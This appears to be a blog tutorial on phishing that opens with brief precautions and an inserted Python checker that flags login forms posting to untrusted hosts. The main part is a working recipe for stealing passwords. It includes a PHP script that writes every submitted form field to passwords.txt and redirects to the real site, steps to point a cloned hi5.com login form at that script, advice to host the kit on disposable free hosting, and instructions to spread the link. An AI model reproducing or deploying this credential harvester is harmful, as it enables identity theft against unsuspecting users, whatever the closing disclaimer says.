“Phishing is a technique used to gain personal information for purposes of identity theft”.

Phishing is the most common technique used by gray hats to steal passwords and other sensitive personal data. It is always important to know where you are entering your passwords. Phishing pages look exactly like the original website in design, but have PHP scripts hidden inside. People who know nothing about PHP tend to get fooled. Links to such pages usually circulate around the internet through social networking sites, spam, JavaScript snippets, etc.

Precautions to take in order to avoid getting hacked:

1. Whenever you are filling in your passwords or any sensitive data, make it a rule to check the address bar. Don’t go any further if you doubt the link shown in the address bar.

2. Never use any JavaScript provided by an unreliable source.

3. Check your browser’s homepage regularly. Make sure it hasn’t been changed by any recently installed application or a script.
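Precaution 1 can be automated. The following is an added example, not code from the original tutorial: it reads the real host out of a URL the way the address bar should be read, and flags a password form that would post somewhere other than the expected site. The trusted domain `hi5.com`, the sample HTML and the function names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormScan(HTMLParser):
    """Collect each form's action and whether it contains a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []  # list of [action, has_password]

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([a.get("action") or "", False])
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1][1] = True

def host_ok(url, trusted):
    """True only if the URL's real host is a trusted domain or a subdomain of one."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in trusted)

def review_login_page(page_url, html, trusted):
    """Return the reasons not to type a password into this page (empty list = none found)."""
    findings = []
    parts = urlsplit(page_url)
    if parts.scheme != "https":
        findings.append("page is not served over https")
    if parts.username is not None:  # text before '@' is not the host
        findings.append("URL has userinfo before '@'; real host is " + (parts.hostname or ""))
    if not host_ok(page_url, trusted):
        findings.append("page host is not the expected site")
    scan = FormScan()
    scan.feed(html)
    for action, has_password in scan.forms:
        target = urljoin(page_url, action)  # a relative action posts to the page's own host
        if has_password and not host_ok(target, trusted):
            findings.append("password form posts to " + (urlsplit(target).hostname or ""))
    return findings

# Constructed sample: a saved login form whose action points at a local script.
SAMPLE_HTML = ('<form method="post" action="phisher.php">'
               '<input name="email"><input type="password" name="password"></form>')
TRUSTED = ["hi5.com"]  # assumption: the site the user believes they are logging in to

if __name__ == "__main__":
    for url in ("http://account.t35.com/index.html", "https://www.hi5.com/friend/login.do"):
        print(url, review_login_page(url, SAMPLE_HTML, TRUSTED))
```

The host comparison is done on the parsed hostname rather than on the raw string, so a URL that merely contains the trusted name (as a leading subdomain label or before an `@`) is still rejected.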

Now for the real part, how to do it? (Not for beginners) queries mail to: indigoanalysis@gmail.com

Suppose you want to create a phishing page of “www123.com”. Firstly go to the website and save its source code to HDD. now make a new php script containing the following code.

<?php
header (‘Location: http://www.hi5.com/friend/login.do ‘);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

now name the php file to say “phisher.php”. Go to the source you saved earlier and in the form replace the action of the form to action = “phisher.php”

Make a text file named passwords.txt

Make an account in free hosting websites( use free one because your account may get deleted for phishing activities) which support php eg: www.bravenet.com or www.t35.com

Upload the html(index.html), php and the text file with your file manager. Distribute your link to the index.html (eg: account.t35.com/index.html)

With this tutorial I aim to enlighten the ignorant and try to protect their identities from getting leaked into the wrong hands. This tutorial isn’t intended for evil purposes. (peace)
Author: Anupum pant, MSME, Ist year MANIT BHOPAL all rights reserved.